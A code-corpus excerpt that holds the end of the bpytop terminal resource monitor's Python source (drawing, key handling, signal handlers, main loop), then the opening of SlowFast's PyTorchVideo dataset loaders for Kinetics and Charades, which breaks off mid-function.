    name = re.sub(r"\d?\.?\d+[mMgG][hH][zZ]", "", name)
    name = " ".join(name.split())
    return name
def get_cpu_core_mapping() -> List[int]:
    '''Map logical processor numbers to physical core indices.

    On Linux the mapping is parsed from /proc/cpuinfo; if parsing fails or
    covers fewer processors than THREADS, falls back to a simple repeating
    0..CORES-1 layout.
    '''
    mapping: List[int] = []
    core_ids: List[int] = []
    if SYSTEM == "Linux" and os.path.isfile("/proc/cpuinfo"):
        try:
            mapping = [0] * THREADS
            num = 0
            with open("/proc/cpuinfo", "r") as f:
                for line in f:
                    if line.startswith("processor"):
                        num = int(line.strip()[(line.index(": ")+2):])
                        if num > THREADS - 1:
                            break
                    elif line.startswith("core id"):
                        core_id = int(line.strip()[(line.index(": ")+2):])
                        if core_id not in core_ids:
                            core_ids.append(core_id)
                        mapping[num] = core_ids.index(core_id)
            if num < THREADS - 1:
                # Fewer processors listed than expected: distrust the result.
                # (Previously signalled by "raise Exception" into a bare except.)
                mapping = []
        except (OSError, ValueError, IndexError):
            # Unreadable or unexpectedly formatted cpuinfo: use the fallback.
            mapping = []
    if not mapping:
        # Fallback: assume threads are laid out round-robin over the cores.
        for _ in range(THREADS // CORES):
            mapping.extend(range(CORES))
    return mapping
def create_box(x: int = 0, y: int = 0, width: int = 0, height: int = 0, title: str = "", title2: str = "", line_color: Union[Color, None] = None, title_color: Union[Color, None] = None, fill: bool = True, box = None) -> str:
    '''Create a box from a box object or by given arguments

    Returns the terminal escape string that draws the box frame (and fills
    the interior when *fill* is True) and leaves the cursor at the top-left
    interior cell. If *box* is given its geometry/name override the explicit
    arguments. Colors default to the current theme.
    '''
    out: str = f'{Term.fg}{Term.bg}'
    num: int = 0
    # None (falsy) colors fall back to theme defaults.
    if not line_color: line_color = THEME.div_line
    if not title_color: title_color = THEME.title
    #* Get values from box class if given
    if box:
        x = box.x
        y = box.y
        width = box.width
        height = box.height
        title = box.name
        num = box.num
    hlines: Tuple[int, int] = (y, y + height - 1)
    out += f'{line_color}'
    #* Draw all horizontal lines
    for hpos in hlines:
        out += f'{Mv.to(hpos, x)}{Symbol.h_line * (width - 1)}'
    #* Draw all vertical lines and fill if enabled
    for hpos in range(hlines[0]+1, hlines[1]):
        out += f'{Mv.to(hpos, x)}{Symbol.v_line}{" " * (width-2) if fill else Mv.r(width-2)}{Symbol.v_line}'
    #* Draw corners
    out += (f'{Mv.to(y, x)}{Symbol.left_up}'
        f'{Mv.to(y, x + width - 1)}{Symbol.right_up}'
        f'{Mv.to(y + height - 1, x)}{Symbol.left_down}'
        f'{Mv.to(y + height - 1, x + width - 1)}{Symbol.right_down}')
    #* Draw titles if enabled
    if title:
        numbered: str = "" if not num else f'{THEME.hi_fg(SUPERSCRIPT[num])}'
        out += f'{Mv.to(y, x + 2)}{Symbol.title_left}{Fx.b}{numbered}{title_color}{title}{Fx.ub}{line_color}{Symbol.title_right}'
    if title2:
        out += f'{Mv.to(hlines[1], x + 2)}{Symbol.title_left}{title_color}{Fx.b}{title2}{Fx.ub}{line_color}{Symbol.title_right}'
    return f'{out}{Term.fg}{Mv.to(y + 1, x + 1)}'
def now_sleeping(signum, frame):
    """Reset terminal settings and stop background input read before putting to sleep"""
    # Signal handler (presumably registered for SIGTSTP — confirm at the
    # registration site): restore the terminal, then stop this process.
    Key.stop()
    Collector.stop()
    Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
    Term.echo(True)
    os.kill(os.getpid(), signal.SIGSTOP)
def now_awake(signum, frame):
    """Set terminal settings and restart background input read"""
    # Signal handler (presumably registered for SIGCONT — confirm at the
    # registration site): re-enter the alt screen and rebuild the full UI.
    Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
    Term.echo(False)
    Key.start()
    Term.refresh()
    Box.calc_sizes()
    Box.draw_bg()
    Collector.start()
def quit_sigint(signum, frame):
    """SIGINT redirection to clean_quit()"""
    # Ctrl-C exits cleanly instead of raising KeyboardInterrupt mid-draw.
    clean_quit()
def clean_quit(errcode: int = 0, errmsg: str = "", thread: bool = False):
    """Stop background input read, save current config and reset terminal settings before quitting"""
    global THREAD_ERROR
    if thread:
        # Called from a worker thread: record the error and interrupt the main
        # thread, which will re-enter clean_quit from the main flow.
        THREAD_ERROR = errcode
        interrupt_main()
        return
    if THREAD_ERROR: errcode = THREAD_ERROR
    Key.stop()
    Collector.stop()
    # Only persist the config on a clean exit, never after an error.
    if not errcode: CONFIG.save_config()
    Draw.now(Term.clear, Term.normal_screen, Term.show_cursor, Term.mouse_off, Term.mouse_direct_off, Term.title())
    Term.echo(True)
    if errcode == 0:
        errlog.info(f'Exiting. Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
    else:
        errlog.warning(f'Exiting with errorcode ({errcode}). Runtime {timedelta(seconds=round(time() - SELF_START, 0))} \n')
        if not errmsg: errmsg = f'Bpytop exited with errorcode ({errcode}). See {CONFIG_DIR}/error.log for more information!'
    if errmsg: print(errmsg)
    raise SystemExit(errcode)
def floating_humanizer(value: Union[float, int], bit: bool = False, per_second: bool = False, start: int = 0, short: bool = False) -> str:
    '''Scales up in steps of 1024 to highest possible unit and returns string with unit suffixed
    * bit=True or defaults to bytes
    * start=int to set 1024 multiplier starting unit
    * short=True always returns 0 decimals and shortens unit to 1 character
    '''
    out: str = ""
    mult: int = 8 if bit else 1
    selector: int = start
    unit: Tuple[str, ...] = UNITS["bit"] if bit else UNITS["byte"]
    # Work in fixed-point: value * 100 keeps two implicit decimal places in an int.
    if isinstance(value, float): value = round(value * 100 * mult)
    elif value > 0: value *= 100 * mult
    else: value = 0
    # Shift down in 1024 steps until at most 5 digits remain; each step moves
    # one unit up the UNITS table.
    while len(f'{value}') > 5 and value >= 102400:
        value >>= 10
        if value < 100:
            out = f'{value}'
            break
        selector += 1
    else:
        # No early break: re-insert the decimal point from the *100 scale.
        if len(f'{value}') == 4 and selector > 0:
            out = f'{value}'[:-2] + "." + f'{value}'[-2]
        elif len(f'{value}') == 3 and selector > 0:
            out = f'{value}'[:-2] + "." + f'{value}'[-2:]
        elif len(f'{value}') >= 2:
            out = f'{value}'[:-2]
        else:
            out = f'{value}'
    if short:
        if "." in out:
            out = f'{round(float(out))}'
        if len(out) > 3:
            # Too wide even without decimals: bump to the next unit.
            out = f'{int(out[0]) + 1}'
            selector += 1
    out += f'{"" if short else " "}{unit[selector][0] if short else unit[selector]}'
    if per_second: out += "ps" if bit else "/s"
    return out
def units_to_bytes(value: str) -> int:
    """Parse a human readable size string into a byte count.

    Accepts optional "k"/"m"/"g" multipliers (powers of 1024), optional
    "bit"/"byte" suffixes (with or without a trailing "s"), and decimal
    values (e.g. "10k", "2.5m", "10kbit", "100"). Returns 0 for empty or
    unparsable input.
    """
    if not value: return 0
    out: int = 0
    mult: int = 0
    bit: bool = False
    value_i: int = 0
    units: Dict[str, int] = {"k" : 1, "m" : 2, "g" : 3}
    try:
        # Strip plural "s", then a "bit"/"byte" suffix.
        if value.lower().endswith("s"):
            value = value[:-1]
        if value.lower().endswith("bit"):
            bit = True
            value = value[:-3]
        elif value.lower().endswith("byte"):
            value = value[:-4]
        # Guard against an empty remainder (e.g. input "bits"): the original
        # `value[-1]` raised an uncaught IndexError here.
        if value and value[-1].lower() in units:
            mult = units[value[-1].lower()]
            value = value[:-1]
        if "." in value and value.replace(".", "").isdigit():
            if mult > 0:
                # Fold the fraction into one 1024-step to stay in integers.
                value_i = round(float(value) * 1024)
                mult -= 1
            else:
                value_i = round(float(value))
        elif value.isdigit():
            value_i = int(value)
        out = int(value_i) << (10 * mult)
        if bit: out = round(out / 8)
    except ValueError:
        out = 0
    return out
def min_max(value: int, min_value: int=0, max_value: int=100) -> int:
    """Clamp *value* into the inclusive range [min_value, max_value]."""
    upper_clamped = min(value, max_value)
    return max(min_value, upper_clamped)
def readfile(file: str, default: str = "") -> str:
    """Return the stripped contents of *file*, or *default* if the file is
    missing or unreadable.

    Best-effort by design: read failures are swallowed. The original bare
    ``except:`` also swallowed KeyboardInterrupt/SystemExit; narrowed to
    I/O and decoding errors only.
    """
    out: Union[str, None] = None
    if os.path.isfile(file):
        try:
            with open(file, "r") as f:
                out = f.read().strip()
        except (OSError, UnicodeError):
            pass
    return default if out is None else out
def temperature(value: int, scale: str = "celsius") -> Tuple[int, str]:
    """Convert an integer celsius reading to the requested scale.

    Returns a (value, unit-string) tuple for "celsius", "fahrenheit",
    "kelvin" or "rankine"; any other scale yields (0, "").
    """
    converted = {
        "celsius": (value, "°C"),
        "fahrenheit": (round(value * 1.8 + 32), "°F"),
        "kelvin": (round(value + 273.15), "K "),
        "rankine": (round(value * 1.8 + 491.67), "°R"),
    }
    return converted.get(scale, (0, ""))
def process_keys():
    """Drain the keyboard/mouse queue and dispatch each event.

    Mutates global UI state (CONFIG, Box, Draw, Term, the collectors and the
    proc/net/mem boxes); returns nothing.
    """
    mouse_pos: Tuple[int, int] = (0, 0)
    filtered: bool = False
    box_keys = {"1" : "cpu", "2" : "mem", "3" : "net", "4" : "proc"}
    while Key.has_key():
        key = Key.get()
        found: bool = True
        # Translate mouse events: clicks outside the process list body become
        # "mouse_unselect", scrolls outside it are dropped.
        if key in ["mouse_scroll_up", "mouse_scroll_down", "mouse_click"]:
            mouse_pos = Key.get_mouse()
            if mouse_pos[0] >= ProcBox.x and ProcBox.current_y + 1 <= mouse_pos[1] < ProcBox.current_y + ProcBox.current_h - 1:
                pass
            elif key == "mouse_click":
                key = "mouse_unselect"
            else:
                key = "_null"
        # While the process filter prompt is active, keys edit the filter
        # string instead of triggering their normal bindings.
        if ProcBox.filtering:
            if key in ["enter", "mouse_click", "mouse_unselect"]:
                ProcBox.filtering = False
                Collector.collect(ProcCollector, redraw=True, only_draw=True)
                continue
            elif key in ["escape", "delete"]:
                ProcCollector.search_filter = ""
                ProcBox.filtering = False
            elif len(key) == 1:
                ProcCollector.search_filter += key
            elif key == "backspace" and len(ProcCollector.search_filter) > 0:
                ProcCollector.search_filter = ProcCollector.search_filter[:-1]
            else:
                continue
            Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
            # Throttle successive filter refreshes slightly.
            if filtered: Collector.collect_done.wait(0.1)
            filtered = True
            continue
        # Global bindings (quit, refresh rate, menus, box layout).
        if key == "_null":
            continue
        elif key == "q":
            clean_quit()
        elif key == "+" and CONFIG.update_ms + 100 <= 86399900:
            CONFIG.update_ms += 100
            Box.draw_update_ms()
        elif key == "-" and CONFIG.update_ms - 100 >= 100:
            CONFIG.update_ms -= 100
            Box.draw_update_ms()
        elif key in ["M", "escape"]:
            Menu.main()
        elif key in ["o", "f2"]:
            Menu.options()
        elif key in ["H", "f1"]:
            Menu.help()
        elif key == "m":
            # Cycle through the preset view modes, wrapping at the end.
            if list(Box.view_modes).index(Box.view_mode) + 1 > len(list(Box.view_modes)) - 1:
                Box.view_mode = list(Box.view_modes)[0]
            else:
                Box.view_mode = list(Box.view_modes)[(list(Box.view_modes).index(Box.view_mode) + 1)]
            CONFIG.shown_boxes = " ".join(Box.view_modes[Box.view_mode])
            Draw.clear(saved=True)
            Term.refresh(force=True)
        elif key in box_keys:
            # Toggle an individual box on/off and switch to the "user" mode.
            boxes = CONFIG.shown_boxes.split()
            if box_keys[key] in boxes:
                boxes.remove(box_keys[key])
            else:
                boxes.append(box_keys[key])
            CONFIG.shown_boxes = " ".join(boxes)
            Box.view_mode = "user"
            Box.view_modes["user"] = CONFIG.shown_boxes.split()
            Draw.clear(saved=True)
            Term.refresh(force=True)
        else:
            found = False
        if found: continue
        # Process-box bindings (only when the proc box is shown).
        if "proc" in Box.boxes:
            if key in ["left", "right", "h", "l"]:
                ProcCollector.sorting(key)
            elif key == " " and CONFIG.proc_tree and ProcBox.selected > 0:
                # Collapse/expand the selected branch in tree view.
                if ProcBox.selected_pid in ProcCollector.collapsed:
                    ProcCollector.collapsed[ProcBox.selected_pid] = not ProcCollector.collapsed[ProcBox.selected_pid]
                Collector.collect(ProcCollector, interrupt=True, redraw=True)
            elif key == "e":
                CONFIG.proc_tree = not CONFIG.proc_tree
                Collector.collect(ProcCollector, interrupt=True, redraw=True)
            elif key == "r":
                CONFIG.proc_reversed = not CONFIG.proc_reversed
                Collector.collect(ProcCollector, interrupt=True, redraw=True)
            elif key == "c":
                CONFIG.proc_per_core = not CONFIG.proc_per_core
                Collector.collect(ProcCollector, interrupt=True, redraw=True)
            elif key in ["f", "F"]:
                # Enter filter mode; capital F makes matching case sensitive.
                ProcBox.filtering = True
                ProcCollector.case_sensitive = key == "F"
                if not ProcCollector.search_filter: ProcBox.start = 0
                Collector.collect(ProcCollector, redraw=True, only_draw=True)
            elif key in ["T", "K", "I"] and (ProcBox.selected > 0 or ProcCollector.detailed):
                # Send SIGTERM/SIGKILL/SIGINT to the selected (or detailed) pid.
                pid: int = ProcBox.selected_pid if ProcBox.selected > 0 else ProcCollector.detailed_pid # type: ignore
                if psutil.pid_exists(pid):
                    if key == "T": sig = signal.SIGTERM
                    elif key == "K": sig = signal.SIGKILL
                    elif key == "I": sig = signal.SIGINT
                    try:
                        os.kill(pid, sig)
                    except Exception as e:
                        errlog.error(f'Exception when sending signal {sig} to pid {pid}')
                        errlog.exception(f'{e}')
            elif key == "delete" and ProcCollector.search_filter:
                ProcCollector.search_filter = ""
                Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
            elif key == "enter":
                # Toggle the detailed view for the selected process.
                if ProcBox.selected > 0 and ProcCollector.detailed_pid != ProcBox.selected_pid and psutil.pid_exists(ProcBox.selected_pid):
                    ProcCollector.detailed = True
                    ProcBox.last_selection = ProcBox.selected
                    ProcBox.selected = 0
                    ProcCollector.detailed_pid = ProcBox.selected_pid
                    ProcBox.resized = True
                    Collector.proc_counter = 1
                elif ProcCollector.detailed:
                    ProcBox.selected = ProcBox.last_selection
                    ProcBox.last_selection = 0
                    ProcCollector.detailed = False
                    ProcCollector.detailed_pid = None
                    ProcBox.resized = True
                    Collector.proc_counter = 1
                else:
                    continue
                # Reset cached detail data and graphs in either direction.
                ProcCollector.details = {}
                ProcCollector.details_cpu = []
                ProcCollector.details_mem = []
                Graphs.detailed_cpu = NotImplemented
                Graphs.detailed_mem = NotImplemented
                Collector.collect(ProcCollector, proc_interrupt=True, redraw=True)
            elif key in ["up", "down", "mouse_scroll_up", "mouse_scroll_down", "page_up", "page_down", "home", "end", "mouse_click", "mouse_unselect", "j", "k"]:
                ProcBox.selector(key, mouse_pos)
        # Net-box bindings.
        if "net" in Box.boxes:
            if key in ["b", "n"]:
                NetCollector.switch(key)
            elif key == "z":
                NetCollector.reset = not NetCollector.reset
                Collector.collect(NetCollector, redraw=True)
            elif key == "y":
                CONFIG.net_sync = not CONFIG.net_sync
                Collector.collect(NetCollector, redraw=True)
            elif key == "a":
                NetCollector.auto_min = not NetCollector.auto_min
                NetCollector.net_min = {"download" : -1, "upload" : -1}
                Collector.collect(NetCollector, redraw=True)
        # Mem-box bindings.
        if "mem" in Box.boxes:
            if key == "g":
                CONFIG.mem_graphs = not CONFIG.mem_graphs
                Collector.collect(MemCollector, interrupt=True, redraw=True)
            elif key == "s":
                Collector.collect_idle.wait()
                CONFIG.swap_disk = not CONFIG.swap_disk
                Collector.collect(MemCollector, interrupt=True, redraw=True)
            elif key == "d":
                Collector.collect_idle.wait()
                CONFIG.show_disks = not CONFIG.show_disks
                Collector.collect(MemCollector, interrupt=True, redraw=True)
            elif key == "i":
                Collector.collect_idle.wait()
                CONFIG.io_mode = not CONFIG.io_mode
                Collector.collect(MemCollector, interrupt=True, redraw=True)
#? Pre main -------------------------------------------------------------------------------------->

# Resolved once at import time and used by the collectors/boxes below.
CPU_NAME: str = get_cpu_name()
CORE_MAP: List[int] = get_cpu_core_mapping()
THEME: Theme  # assigned in main() once the configured color theme is loaded
def main():
    """Program entry point: initialize the terminal, theme, boxes, threads
    and signal handlers, then run the collect/draw loop until quit."""
    global THEME

    Term.width = os.get_terminal_size().columns
    Term.height = os.get_terminal_size().lines

    #? Init -------------------------------------------------------------------------------------->
    if DEBUG: TimeIt.start("Init")

    #? Switch to alternate screen, clear screen, hide cursor, enable mouse reporting and disable input echo
    Draw.now(Term.alt_screen, Term.clear, Term.hide_cursor, Term.mouse_on, Term.title("BpyTOP"))
    Term.echo(False)
    #Term.refresh(force=True)

    #? Start a thread checking for updates while running init
    if CONFIG.update_check: UpdateChecker.run()

    #? Draw banner and init status
    if CONFIG.show_init and not Init.resized:
        Init.start()

    #? Load theme
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Loading theme and creating colors... ")}{Mv.save}')
    try:
        THEME = Theme(CONFIG.color_theme)
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Setup boxes
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Doing some maths and drawing... ")}{Mv.save}')
    try:
        if CONFIG.check_temp: CpuCollector.get_sensors()
        Box.calc_sizes()
        Box.draw_bg(now=False)
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Setup signal handlers for SIGSTP, SIGCONT, SIGINT and SIGWINCH
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Setting up signal handlers... ")}{Mv.save}')
    try:
        signal.signal(signal.SIGTSTP, now_sleeping) #* Ctrl-Z
        signal.signal(signal.SIGCONT, now_awake) #* Resume
        signal.signal(signal.SIGINT, quit_sigint) #* Ctrl-C
        signal.signal(signal.SIGWINCH, Term.refresh) #* Terminal resized
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Start a separate thread for reading keyboard input
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting input reader thread... ")}{Mv.save}')
    try:
        # Ignore undecodable input bytes so odd terminals can't crash the reader.
        if isinstance(sys.stdin, io.TextIOWrapper) and sys.version_info >= (3, 7):
            sys.stdin.reconfigure(errors="ignore")  # type: ignore
        Key.start()
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Start a separate thread for data collection and drawing
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Starting data collection and drawer thread... ")}{Mv.save}')
    try:
        Collector.start()
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Collect data and draw to buffer
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Collecting data and drawing... ")}{Mv.save}')
    try:
        Collector.collect(draw_now=False)
        pass
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    #? Draw to screen
    if CONFIG.show_init:
        Draw.buffer("+init!", f'{Mv.restore}{Fx.trans("Finishing up... ")}{Mv.save}')
    try:
        Collector.collect_done.wait()
    except Exception as e:
        Init.fail(e)
    else:
        Init.success()

    Init.done()
    Term.refresh()
    Draw.out(clear=True)
    if CONFIG.draw_clock:
        Box.clock_on = True
    if DEBUG: TimeIt.stop("Init")

    #? Main loop ------------------------------------------------------------------------------------->
    def run():
        # Endless loop: refresh, then poll input until the timer expires,
        # then trigger the next collection cycle.
        while not False:
            Term.refresh()
            Timer.stamp()
            while Timer.not_zero():
                if Key.input_wait(Timer.left()):
                    process_keys()
            Collector.collect()

    #? Start main loop
    try:
        run()
    except Exception as e:
        errlog.exception(f'{e}')
        clean_quit(1)
    else:
        #? Quit cleanly even if false starts being true...
        clean_quit()
# Run only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
| 37.802334 | 541 | 0.632463 |
1bbeb584d661c3ceb8c4da58baca1c42906a21ca | 24,181 | py | Python | build/lib/slowfast/datasets/ptv_datasets.py | shir3bar/SlowFast | 9a234526ee2056db8b9f89845ed34f70da225ba0 | [
"Apache-2.0"
] | null | null | null | build/lib/slowfast/datasets/ptv_datasets.py | shir3bar/SlowFast | 9a234526ee2056db8b9f89845ed34f70da225ba0 | [
"Apache-2.0"
] | null | null | null | build/lib/slowfast/datasets/ptv_datasets.py | shir3bar/SlowFast | 9a234526ee2056db8b9f89845ed34f70da225ba0 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import cv2
import numpy
numpy.random.normal()
import functools
import os
from typing import Dict
import torch
from torch.utils.data import (
DistributedSampler,
RandomSampler,
SequentialSampler,
)
from torchvision.transforms import Compose, Lambda
from torchvision.transforms._transforms_video import (
NormalizeVideo,
RandomCropVideo,
RandomHorizontalFlipVideo,
)
import slowfast.utils.logging as logging
from pytorchvideo.data import (
Charades,
LabeledVideoDataset,
SSv2,
make_clip_sampler,
)
from pytorchvideo.data.labeled_video_paths import LabeledVideoPaths
from pytorchvideo.transforms import (
ApplyTransformToKey,
RandomShortSideScale,
ShortSideScale,
UniformCropVideo,
UniformTemporalSubsample,
)
from . import utils as utils
from .build import DATASET_REGISTRY
logger = logging.get_logger(__name__)
class PTVDatasetWrapper(torch.utils.data.IterableDataset):
    """Adapter exposing a PyTorchVideo iterable dataset through the
    clip-count/sampler interface expected by the PySlowFast loaders."""

    def __init__(self, num_videos, clips_per_video, crops_per_clip, dataset):
        """Wrap *dataset*.

        Args:
            num_videos (int): number of videos in the dataset.
            clips_per_video (int): clips sampled per video.
            crops_per_clip (int): spatial crops per clip.
            dataset (torch.utils.data.IterableDataset): a PyTorchVideo dataset.
        """
        self._num_videos = num_videos
        self._clips_per_video = clips_per_video
        self._crops_per_clip = crops_per_clip
        self.dataset = dataset

    def __iter__(self):
        return self

    def __next__(self):
        """Return the next clip produced by the wrapped dataset."""
        return next(self.dataset)

    @property
    def sampler(self):
        """(torch.utils.data.Sampler): video sampler of the wrapped dataset."""
        return self.dataset.video_sampler

    def __len__(self):
        """(int): number of clips per replica in the IterableDataset."""
        return len(self.sampler) * self._clips_per_video * self._crops_per_clip

    @property
    def num_videos(self):
        """(int): total number of clips in the dataset."""
        return self._num_videos * self._clips_per_video * self._crops_per_clip
class PackPathway(torch.nn.Module):
    """
    Transform for converting video frames as a list of tensors. Each tensor
    corresponding to a unique pathway (e.g. slow/fast for SlowFast models).
    """

    def __init__(self, cfg):
        super().__init__()
        # SlowFast config node; consulted by utils.pack_pathway_output.
        self.cfg = cfg

    def forward(self, x: torch.Tensor):
        # Delegates the actual frame packing to the shared dataset utility.
        return utils.pack_pathway_output(self.cfg, x)
class DictToTuple(torch.nn.Module):
    """Convert a PyTorchVideo clip dict into the (frames, label, index, meta)
    tuple format used by PySlowFast."""

    def __init__(self, num_clips, num_crops):
        """Store the per-video clip/crop counts used to flatten indices."""
        super().__init__()
        self._num_clips = num_clips
        self._num_crops = num_crops

    def forward(self, x: Dict[str, torch.Tensor]):
        # Flatten (video, clip, crop) coordinates into one global clip index.
        clips_per_video = self._num_clips * self._num_crops
        flat_index = (
            x["video_index"] * clips_per_video
            + x["clip_index"] * self._num_crops
            + x["aug_index"]
        )
        return x["video"], x["label"], flat_index, {}
def div255(x):
    """Scale clip frames from the [0, 255] range down to [0, 1].

    Args:
        x (Tensor): clip frames, shape (channel, time, height, width).
    Returns:
        Tensor: the input divided by 255.
    """
    scaled = x / 255.0
    return scaled
def rgb2gray(x):
    """
    Keep only the first (R) channel of a clip tensor, preserving the channel
    dimension (output shape: (1, time, height, width)).

    Note: despite the name, no luminance weighting is applied -- this simply
    selects channel 0, which is true grayscale only if all channels are equal.
    (The previous docstring incorrectly described an RGB->BGR conversion.)

    Args:
        x (Tensor): A tensor of the clip's RGB frames with shape:
            (channel, time, height, width).
    Returns:
        x (Tensor): Single-channel tensor.
    """
    return x[[0], ...]
@DATASET_REGISTRY.register()
def Ptvkinetics(cfg, mode):
    """
    Construct the Kinetics video loader with a given csv file. The format of
    the csv file is:
    ```
    path_to_video_1 label_1
    path_to_video_2 label_2
    ...
    path_to_video_N label_N
    ```
    For `train` and `val` mode, a single clip is randomly sampled from every video
    with random cropping, scaling, and flipping. For `test` mode, multiple clips are
    uniformaly sampled from every video with center cropping.
    Args:
        cfg (CfgNode): configs.
        mode (string): Options includes `train`, `val`, or `test` mode.
            For the train and val mode, the data loader will take data
            from the train or val set, and sample one clip per video.
            For the test mode, the data loader will take data from test set,
            and sample multiple clips per video.
    """
    # Only support train, val, and test mode.
    assert mode in [
        "train",
        "val",
        "test",
    ], "Split '{}' not supported".format(mode)
    logger.info("Constructing Ptvkinetics {}...".format(mode))

    # Clip length in seconds at the target frame rate.
    clip_duration = (
        cfg.DATA.NUM_FRAMES * cfg.DATA.SAMPLING_RATE / cfg.DATA.TARGET_FPS
    )
    path_to_file = os.path.join(
        cfg.DATA.PATH_TO_DATA_DIR, "{}.csv".format(mode)
    )
    labeled_video_paths = LabeledVideoPaths.from_path(path_to_file)
    num_videos = len(labeled_video_paths)
    labeled_video_paths.path_prefix = cfg.DATA.PATH_PREFIX
    logger.info(
        "Constructing kinetics dataloader (size: {}) from {}".format(
            num_videos, path_to_file
        )
    )

    if mode in ["train", "val"]:
        # One randomly positioned clip per video with train-time augmentation.
        num_clips = 1
        num_crops = 1
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            RandomShortSideScale(
                                min_size=cfg.DATA.TRAIN_JITTER_SCALES[0],
                                max_size=cfg.DATA.TRAIN_JITTER_SCALES[1],
                            ),
                            RandomCropVideo(cfg.DATA.TRAIN_CROP_SIZE),
                        ]
                        + (
                            [RandomHorizontalFlipVideo(p=0.5)]
                            if cfg.DATA.RANDOM_FLIP
                            else []
                        )
                        + [PackPathway(cfg)]
                    ),
                ),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler("random", clip_duration)
        if cfg.NUM_GPUS > 1:
            video_sampler = DistributedSampler
        else:
            video_sampler = (
                RandomSampler if mode == "train" else SequentialSampler
            )
    else:
        # Test mode: fixed ensemble of clips x spatial crops per video.
        num_clips = cfg.TEST.NUM_ENSEMBLE_VIEWS
        num_crops = cfg.TEST.NUM_SPATIAL_CROPS
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            UniformTemporalSubsample(cfg.DATA.NUM_FRAMES),
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            ShortSideScale(
                                size=cfg.DATA.TRAIN_JITTER_SCALES[0]
                            ),
                        ]
                    ),
                ),
                UniformCropVideo(size=cfg.DATA.TEST_CROP_SIZE),
                ApplyTransformToKey(key="video", transform=PackPathway(cfg)),
                DictToTuple(num_clips, num_crops),
            ]
        )
        clip_sampler = make_clip_sampler(
            "constant_clips_per_video",
            clip_duration,
            num_clips,
            num_crops,
        )
        video_sampler = (
            DistributedSampler if cfg.NUM_GPUS > 1 else SequentialSampler
        )

    return PTVDatasetWrapper(
        num_videos=num_videos,
        clips_per_video=num_clips,
        crops_per_clip=num_crops,
        dataset=LabeledVideoDataset(
            labeled_video_paths=labeled_video_paths,
            clip_sampler=clip_sampler,
            video_sampler=video_sampler,
            transform=transform,
            decode_audio=False,
        ),
    )
def process_charades_label(x, mode, num_classes):
    """
    Process the video label for Charades dataset. Use video-level label for
    training mode, otherwise use clip-level label. Then convert the label into
    a binary vector.
    Args:
        x (dict): a video clip including label index.
        mode (string): Options includes `train`, `val`, or `test` mode.
        num_classes (int): Number of classes in the dataset.
    Returns:
        x (dict): video clip with updated label information.
    """
    if mode == "train":
        label = utils.aggregate_labels(x["label"])
    else:
        label = x["video_label"]
    x["label"] = torch.as_tensor(utils.as_binary_vector(label, num_classes))
    return x
def rgb2bgr(x):
    """Reorder the first three (RGB) channels of a clip tensor to BGR.

    Args:
        x (Tensor): clip frames, shape (channel, time, height, width).
    Returns:
        Tensor: the same frames with channels 0..2 reversed.
    """
    bgr_order = [2, 1, 0]
    return x[bgr_order, ...]
@DATASET_REGISTRY.register()
def Ptvcharades(cfg, mode):
    """
    Construct PyTorchVideo Charades video loader.
    Load Charades data (frame paths, labels, etc. ) to Charades Dataset object.
    The dataset could be downloaded from Chrades official website
    (https://allenai.org/plato/charades/).
    Please see datasets/DATASET.md for more information about the data format.
    For `train` and `val` mode, a single clip is randomly sampled from every video
    with random cropping, scaling, and flipping. For `test` mode, multiple clips are
    uniformaly sampled from every video with center cropping.
    Args:
        cfg (CfgNode): configs.
        mode (string): Options includes `train`, `val`, or `test` mode.
            For the train and val mode, the data loader will take data
            from the train or val set, and sample one clip per video.
            For the test mode, the data loader will take data from test set,
            and sample multiple clips per video.
    """
    # Only support train, val, and test mode.
    assert mode in [
        "train",
        "val",
        "test",
    ], "Split '{}' not supported".format(mode)
    logger.info("Constructing Ptvcharades {}...".format(mode))

    # Clip length in seconds; Charades counts (frames - 1) * rate + 1 frames.
    clip_duration = (
        (cfg.DATA.NUM_FRAMES - 1) * cfg.DATA.SAMPLING_RATE + 1
    ) / cfg.DATA.TARGET_FPS

    if mode in ["train", "val"]:
        # One random clip per video with train-time augmentation; frames are
        # converted to BGR order before pathway packing.
        num_clips = 1
        num_crops = 1
        transform = Compose(
            [
                ApplyTransformToKey(
                    key="video",
                    transform=Compose(
                        [
                            Lambda(div255),
                            NormalizeVideo(cfg.DATA.MEAN, cfg.DATA.STD),
                            RandomShortSideScale(
                                min_size=cfg.DATA.TRAIN_JITTER_SCALES[0],
                                max_size=cfg.DATA.TRAIN_JITTER_SCALES[1],
                            ),
                            RandomCropVideo(cfg.DATA.TRAIN_CROP_SIZE),
                            Lambda(rgb2bgr),
                        ]
                        + (
                            [RandomHorizontalFlipVideo(p=0.5)]
                            if cfg.DATA.RANDOM_FLIP
                            else []
                        )
